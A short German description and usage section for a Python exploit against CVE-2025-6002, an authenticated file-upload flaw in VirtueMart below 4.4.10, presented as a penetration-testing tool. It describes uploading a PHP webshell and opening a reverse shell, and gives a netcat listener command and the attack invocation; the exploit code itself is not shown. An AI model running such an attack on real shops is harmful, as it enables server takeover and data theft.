
Python-Exploit für CVE-2025-6002, der auf einen authentifizierten beliebigen Dateiupload in VirtueMart < 4.4.10 abzielt. Meldet sich an, lädt eine PHP-Webshell hoch und löst eine Reverse-Shell für Penetrationstests aus.
Dieses Skript nutzt die authentifizierte Schwachstelle für beliebige Dateiuploads in VirtueMart < 4.4.10 (CVE-2025-6002) aus, die in diesem Blogbeitrag beschrieben ist: https://blog.blacklanternsecurity.com/p/doomla-zero-days
Dieses Skript meldet sich mit den angegebenen Anmeldedaten bei VirtueMart an, erstellt ein neues Produkt und lädt eine PHP-Webshell als Mediendatei hoch. Anschließend wird eine Reverse-Shell zur angegebenen IP/Port gestartet.
Parameter:
Verwendung:
nc -nlvp 1337
python3 exploit.py --url http://x.x.x.x --username admin --password kartoffel --remote-ip x.x.x.x --remote-port 1337